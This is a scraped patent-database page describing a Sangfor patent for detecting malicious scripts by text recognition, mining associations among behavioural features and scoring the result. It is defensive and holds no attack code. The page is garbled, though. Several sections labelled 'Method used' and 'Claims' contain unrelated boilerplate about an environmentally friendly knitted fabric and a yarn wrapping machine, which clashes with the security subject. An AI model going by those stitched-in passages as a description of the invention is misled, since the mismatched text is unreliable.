A malicious script detection method, device and storage medium

A malicious script and detection method technology, which is applied in the field of network security, can solve the problems that cannot be detected and killed correctly, sandbox and other devices cannot be effectively identified, and file format identification is difficult, so as to eliminate the behavior of forged suffixes and make it easy to explain , reducing the effect of technical effects

Active Publication Date: 2022-06-21
SANGFOR TECH INC
View PDF6 Cites 0 Cited by
  • Summary
  • Abstract
  • Description
  • Claims
  • Application Information

AI Technical Summary

Problems solved by technology

[0008] 2. Most malicious scripts have forged suffixes, which makes it difficult to identify file formats, and sandboxes and other devices cannot effectively identify them
[0009] 3. Most downloader malicious scripts will pull Internet viruses and execute them in memory, and the virus parent will not be saved on the victim's disk, so even if anti-virus software is installed, it cannot be detected and killed correctly (that is, a typical fileless attack)

Method used

the structure of the environmentally friendly knitted fabric provided by the present invention; figure 2 Flow chart of the yarn wrapping machine for environmentally friendly knitted fabrics and storage devices; image 3 Is the parameter map of the yarn covering machine
View more

Image

Smart Image Click on the blue labels to locate them in the text.
Viewing Examples
Smart Image
  • A malicious script detection method, device and storage medium
  • A malicious script detection method, device and storage medium
  • A malicious script detection method, device and storage medium

Examples

Experimental program
Comparison scheme
Effect test

Embodiment Construction

[0081] The technical solutions in the embodiments of the present invention will be clearly and completely described below with reference to the accompanying drawings in the embodiments of the present invention.

[0082] like figure 1 As shown, the embodiment of the present application provides a malicious script detection method, including:

[0083] S101. Obtain a file to be detected.

[0084] The malicious script detection method in the embodiment of the present application can be applied to a host device or a mobile device (a malicious script detection device), and the malicious script file can be monitored by acquiring files to be detected saved or received in the host device or mobile device. .

[0085] Among them, the files to be detected mainly include files downloaded by the host device or mobile device through the Web, files transmitted through FTP, SMB intranet transmission, and office macro script files that may exist in email attachments.

[0086] S102. Perform t...

the structure of the environmentally friendly knitted fabric provided by the present invention; figure 2 Flow chart of the yarn wrapping machine for environmentally friendly knitted fabrics and storage devices; image 3 Is the parameter map of the yarn covering machine
Login to view more

PUM

No PUM Login to view more

Abstract

The embodiment of the present invention discloses a malicious script detection method, device and storage medium, comprising: obtaining a file to be detected; performing text recognition on the file to be detected to obtain a text to be detected; detecting whether there is at least one Specific behavioral features; if it exists, carry out association rule mining processing on the at least one specific behavioral feature, and determine an associated behavioral feature combination that satisfies a preset condition. The preset condition is the minimum support and sum of the behavioral feature combination. minimum credibility; obtaining the scoring result corresponding to the associated behavior feature combination; and judging whether the file to be detected is a malicious script based on the scoring result. Through the text recognition of the files to be detected, the behavior of malicious scripts forging suffixes is eliminated. Through the correlation analysis of the behavior characteristics of the files to be detected, the judgment of malicious scripts has better interpretation and reduces the technical effect of false positives.

Description

technical field [0001] The invention relates to the technical field of network security, in particular to a malicious script detection method, device and storage medium. Background technique [0002] With the maturity of current anti-virus technology, traditional PE viruses are more and more difficult to penetrate into the host network, and are often blocked by gateway security devices such as AF and WAF. Therefore, more and more network attacks begin to use malicious scripts to avoid killing (bypass), because most security products do not have the ability to detect plain text files, and often adopt a release strategy to make it possible to invade user hosts. Effect. [0003] The existing technology mainly adopts the following methods to prevent such attacks: [0004] 1. Deploy firewalls, virus gateways, sandboxes and other equipment at the network exit to monitor and kill incoming traffic. [0005] 2. Install anti-virus software on the terminal machine for overall monito...

Claims

the structure of the environmentally friendly knitted fabric provided by the present invention; figure 2 Flow chart of the yarn wrapping machine for environmentally friendly knitted fabrics and storage devices; image 3 Is the parameter map of the yarn covering machine
Login to view more

Application Information

Patent Timeline
no application Login to view more
Patent Type & Authority Patents(China)
IPC IPC(8): H04L9/40
CPCH04L63/145H04L63/1408H04L63/1416
Inventor 杨玉华蒲大峰
Owner SANGFOR TECH INC
Who we serve
  • R&D Engineer
  • R&D Manager
  • IP Professional
Why Eureka
  • Industry Leading Data Capabilities
  • Powerful AI technology
  • Patent DNA Extraction
Social media
Try Eureka
PatSnap group products